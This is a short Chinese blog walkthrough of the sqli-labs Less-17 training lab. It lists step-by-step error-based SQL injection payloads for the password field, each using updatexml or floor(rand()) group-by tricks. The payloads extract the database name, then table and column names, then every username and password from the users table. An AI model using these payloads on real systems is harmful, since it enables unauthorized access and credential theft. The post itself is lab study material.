SQL注入实例（sqli-labs/less-17）

15 阅读 0 评论 0 点赞

0、初始网页

1、确定闭合字符

注入点在于password框，闭合字符为单引号

2、爆库名

1' and updatexml(1,concat(0x7e,database(),0x7e),1)#

1' and (select 1 from (select count(*),concat((select database()),floor(rand()*2))x from information_schema.tables group by x) as y) #

3、爆表名

1' and (select 1 from (select count(*),concat((select group_concat(table_name) from information_schema.tables where table_schema='security'),floor(rand()*2))x from information_schema.tables group by x) as y) #

4、爆列名

1' and (select 1 from (select count(*),concat((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),floor(rand()*2))x from information_schema.tables group by x) as y) #

5、查询最终结果

1' and (select 1 from (select count(*),concat((select group_concat(username,0x3a,password) from users),floor(rand()*2))x from information_schema.tables group by x) as y) #

本站资源均来自互联网，仅供研究学习，禁止违法使用和商用，产生法律纠纷本站概不负责！如果侵犯了您的权益请与我们联系！

转载请注明出处：免费源码网-免费的源码资源网站 » SQL注入实例（sqli-labs/less-17）

点赞(0) 打赏

本文分类：文章资讯
本文标签：SQL注入实例（sqli-labs/less-17）
浏览次数：15 次浏览
本文链接：https://freeymw.com/article/22036.html

上一篇 > 【使用 Python 脚本彻底清理 Windows 电脑垃圾】
下一篇 > Flink SQL 基础操作

评论列表共有 0 条评论

暂无评论

SQL注入实例（sqli-labs/less-17）

0、初始网页

1、确定闭合字符

2、爆库名

3、爆表名

4、爆列名

5、查询最终结果

评论列表 共有 0 条评论

发表评论 取消回复

评论列表共有 0 条评论

发表评论取消回复